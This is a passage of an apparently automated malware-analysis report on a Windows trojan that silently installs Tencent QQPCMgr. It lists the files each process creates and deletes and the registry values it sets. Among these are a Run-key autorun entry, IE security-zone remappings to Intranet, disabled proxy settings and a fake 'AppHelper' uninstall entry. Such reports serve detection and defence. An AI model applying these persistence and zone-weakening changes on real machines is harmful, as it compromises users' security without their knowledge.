%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\qmudiskmgr\QMUDiskMgr.dll (7701 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\GarbageCleaner.dll (9986 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\QQPCNetFlow.dat (832 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCMgr.rdb (7386 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_15.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1607.dat (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCAVSetting.dat (696 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPConfig.exe (3126 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1104.dat (454 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QOLogo\QQPCLaunch.png (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\version.ini (39 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMIEProtectIo.dll (1308 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QQPCWifiSafe\Common.dll (15392 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCmgrInstallGuide.exe (5224 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysHomePage\syshomepage.tpc (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTipsConfig.dat (9 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_2016.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\Common.dll (17486 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\script\pb_1301.dat (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\AdfilterExtension.crx (213 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\SysSpeedUp\SysSpeedUp.dll (1598 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\QMHwFloatWnd\QMHwFloatWnd.dll (3944 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1879.png (1 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\ClassicLogo\SysOptimize.png (597 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMClinicsettingcenter\QMClinicSettingCenter.rdb (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMTrayPlugin\GameSpeedupExposure\GameSpeedupExposure.tpc (953 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAO\NiZhanConfig.etf (3 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\TAOClient.dll (4264 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMHIPSPolicyEng.dll (6630 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\ClinicData\pic\sTurnOnAdapter.png (16 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QQPCFIXATDLL.DLL (8927 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\Image\xpword.png (5 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\malware\logo\plugin_1977.png (2 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMSafeBoxHelperDll.dll (2504 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMNetMon\QQPCNetFlow.rdb (6307 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virscr04.def (7 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\plugins\QMSCGeneralPlugin\QMSCGeneralPlugin.tpc (723 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\QMUpdate\QQPCMgrUpdate.dat (656 bytes)
%Program Files%\Tencent\QQPCMgr\11.4.17339.217\tpk\1.0.0.1\def\virswf01.def (656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.ATL\8.0.50727.4053.cat (7 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\Tencent\QQPCMgr\QQPCMgrInstall_20160325034841.Log (0 bytes)

The process 05a00036.exe:304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0L2B8HQ7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qqpcmgr_v11.4.17339.217_90008_Silence.exe (1658515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9G23GV1J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KT6ZWPUN\desktop.ini (67 bytes)
%Documents and Settings%\All Users\Start Menu\Set Program Access and Defaults.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (1 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\All Users\Start Menu\Windows Update.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4D27WPM7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (198 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)
%Documents and Settings%\All Users\Start Menu\Windows Catalog.lnk (0 bytes)
%Documents and Settings%\All Users\Start Menu\Windows Update.lnk (0 bytes)
%Documents and Settings%\All Users\Start Menu\Set Program Access and Defaults.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (0 bytes)

The process InstAsm.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\WinSxS\InstallTemp\578184\Policies\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_d780e993 (4 bytes)
%WinDir%\WinSxS\InstallTemp\584679\Policies\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_5f0bbcff\8.0.50727.4053.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\590281\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773 (4 bytes)
%WinDir%\WinSxS\InstallTemp\572300\Manifests\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69.Manifest (1 bytes)
%WinDir%\WinSxS\InstallTemp\572300\Manifests (4 bytes)
%WinDir%\WinSxS\InstallTemp\560109\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd\ATL80.dll (601 bytes)
%WinDir%\WinSxS\InstallTemp\586830\Manifests (4 bytes)
%WinDir%\WinSxS\InstallTemp\581874\Manifests\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\560109\Manifests\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd.Manifest (468 bytes)
%WinDir%\WinSxS\InstallTemp\581874\Manifests (4 bytes)
%WinDir%\WinSxS\InstallTemp\572300\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\msvcr80.dll (5873 bytes)
%WinDir%\WinSxS\InstallTemp\560109\Manifests\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\586830\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcp80.dll (3361 bytes)
%WinDir%\WinSxS\InstallTemp\578184\Policies\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_d780e993\8.0.50727.4053.Policy (808 bytes)
%WinDir%\WinSxS\InstallTemp\590281\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773\8.0.50727.4053.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\581874\Manifests\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd.Manifest (466 bytes)
%WinDir%\WinSxS\InstallTemp\568451\Policies\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_beca5f1f (4 bytes)
%WinDir%\WinSxS\InstallTemp\586830\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcm80.dll (3073 bytes)
%WinDir%\WinSxS\InstallTemp\572300\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\msvcp80.dll (7433 bytes)
%WinDir%\WinSxS\InstallTemp\586830\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\msvcr80.dll (4185 bytes)
%WinDir%\WinSxS\InstallTemp\586830\Manifests\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\560109\Manifests (4 bytes)
%WinDir%\WinSxS\InstallTemp\568451\Policies\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_beca5f1f\8.0.50727.4053.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\578184\Policies\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_d780e993\8.0.50727.4053.cat (7 bytes)
%WinDir%\WinSxS\InstallTemp\568451\Policies\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_beca5f1f\8.0.50727.4053.Policy (808 bytes)
%WinDir%\WinSxS\InstallTemp\572300\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\msvcm80.dll (3073 bytes)
%WinDir%\WinSxS\InstallTemp\584679\Policies\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_5f0bbcff\8.0.50727.4053.Policy (804 bytes)
%WinDir%\WinSxS\InstallTemp\581874\x86_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_473666fd\ATL80.dll (601 bytes)
%WinDir%\WinSxS\InstallTemp\584679\Policies\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_5f0bbcff (4 bytes)
%WinDir%\WinSxS\InstallTemp\590281\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773\8.0.50727.4053.Policy (804 bytes)
%WinDir%\WinSxS\InstallTemp\586830\Manifests\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989.Manifest (1 bytes)
%WinDir%\WinSxS\InstallTemp\572300\Manifests\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69.cat (7 bytes)

The Trojan deletes the following file(s):

%WinDir%\WinSxS\InstallTemp\578184\Policies\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_d780e993 (0 bytes)
%WinDir%\WinSxS\InstallTemp\568451\Manifests (0 bytes)
%WinDir%\WinSxS\InstallTemp\590281\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773 (0 bytes)
%WinDir%\WinSxS\InstallTemp\590281\Manifests (0 bytes)
%WinDir%\WinSxS\InstallTemp\560109\Manifests (0 bytes)
%WinDir%\WinSxS\InstallTemp\586830\Manifests (0 bytes)
%WinDir%\WinSxS\InstallTemp\581874\Manifests (0 bytes)
%WinDir%\WinSxS\InstallTemp\581874 (0 bytes)
%WinDir%\WinSxS\InstallTemp\568451\Policies (0 bytes)
%WinDir%\WinSxS\InstallTemp\590281 (0 bytes)
%WinDir%\WinSxS\InstallTemp\584679 (0 bytes)
%WinDir%\WinSxS\InstallTemp\590281\Policies (0 bytes)
%WinDir%\WinSxS\InstallTemp\584679\Manifests (0 bytes)
%WinDir%\WinSxS\InstallTemp\584679\Policies\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_5f0bbcff (0 bytes)
%WinDir%\WinSxS\InstallTemp\568451\Policies\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_x-ww_beca5f1f (0 bytes)
%WinDir%\WinSxS\InstallTemp\584679\Policies (0 bytes)
%WinDir%\WinSxS\InstallTemp\586830 (0 bytes)
%WinDir%\WinSxS\InstallTemp\572300\Manifests (0 bytes)
%WinDir%\WinSxS\InstallTemp\578184 (0 bytes)
%WinDir%\WinSxS\InstallTemp\578184\Manifests (0 bytes)
%WinDir%\WinSxS\InstallTemp\560109 (0 bytes)
%WinDir%\WinSxS\InstallTemp\578184\Policies (0 bytes)
%WinDir%\WinSxS\InstallTemp\568451 (0 bytes)
%WinDir%\WinSxS\InstallTemp\572300 (0 bytes)

The process qqpcmgr_v11.4.17339.217_90008_Silence.exe:296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\QQPCMgr_Setup.exe (6588078 bytes)

The process %original file name%.exe:1216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\D610144C-D2B9-429A-BDD5-C143E00B5CE3\05a00036.exe (23407 bytes)

Registry activity

The process QQPCMgr_Setup.exe:1648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 3E B6 1A C3 2D 66 FC 4B 3F D2 03 FD 81 EF E1"

[HKLM\SOFTWARE\Tencent\QQPCMgr]
"SupplyID" = "90008"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process 05a00036.exe:304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AppHelper]
"DisplayName" = "AppHelper"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AppHelper]
"DisplayIcon" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\D610144C-D2B9-429A-BDD5-C143E00B5CE3\05a00036.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AppHelper]
"InstallLocation" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\D610144C-D2B9-429A-BDD5-C143E00B5CE3\05a00036.exe /u"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AppHelper]
"UninstallString" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\D610144C-D2B9-429A-BDD5-C143E00B5CE3\05a00036.exe /u"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AppHelper]
"DisplayVersion" = "1.0"

"Publisher" = "AppHelper"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 70 EE 65 1B F6 31 72 96 2C 18 29 4B BB 43 A6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"05a00036" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\D610144C-D2B9-429A-BDD5-C143E00B5CE3\05a00036.exe /start"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process sc.exe:1804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 E8 94 D8 E8 22 01 71 B1 25 B1 12 8E 07 B8 24"

The process InstAsm.exe:464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989]
"ShortName" = "X86_MI~2.405"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd]
"Identity" = "Microsoft.VC80.ATL,processorArchitecture=amd64,publicKeyToken=1fc8b3b9a1e18e3b,type=win32,version=8.0.50727.4053"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989]
"CodeBase" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd]
"ShortCatalogName" = "AMD64_~1.CAT"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4]
"ManifestSHA1Hash" = "02 F9 F1 3C B4 FA 95 B8 96 2C 63 22 88 6F AF 86"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd]
"Catalog" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4]
"ShortManifestName" = "805072~1.POL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989]
"ShortManifestName" = "X84004~1.MAN"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\Files\0]
"SHA1" = "AF 6E 52 0E 95 FE 6B D9 8C CF 2A F3 EB F1 0C 06"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404]
"ShortName" = "805072~1.POL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69\Files\0]
"(Default)" = "msvcr80.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_bd4409e4]
"CodeBase" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.ATL\8.0.50727.4053.policy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd]
"PublicKeyToken" = "1F C8 B3 B9 A1 E1 8E 3B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69]
"ShortManifestName" = "AMD64_~2.MAN"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_8b3a2404\Codebases\F_C:\;a8a67a25;DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\TestMSVCR.exe]
"URL" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.ATL\8.0.50727.4053.Policy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\Files\2]
"(Default)" = "msvcm80.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690]
"CodeBase" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\Microsoft.VC80.CRT\8.0.50727.4053.Policy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\Files\2]
"SHA1" = "34 F5 7D 3D 73 B2 81 0F A7 B5 DD C1 11 89 8F 13"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989]
"Identity" = "Microsoft.VC80.CRT,processorArchitecture=x86,publicKeyToken=1fc8b3b9a1e18e3b,type=win32,version=8.0.50727.4053"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69]
"ShortName" = "AMD64_~2.405"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_5ca41c70]
"CodeBase" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\8.0.50727.4053.policy"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.ATL_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_79404cdd\Files\0]
"(Default)" = "ATL80.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\amd64_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_18a05f69]
"CodeBase" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Tencent\QQPCMgr\~5bf40\AMD64.Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide\Installations\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_2a9a3690]
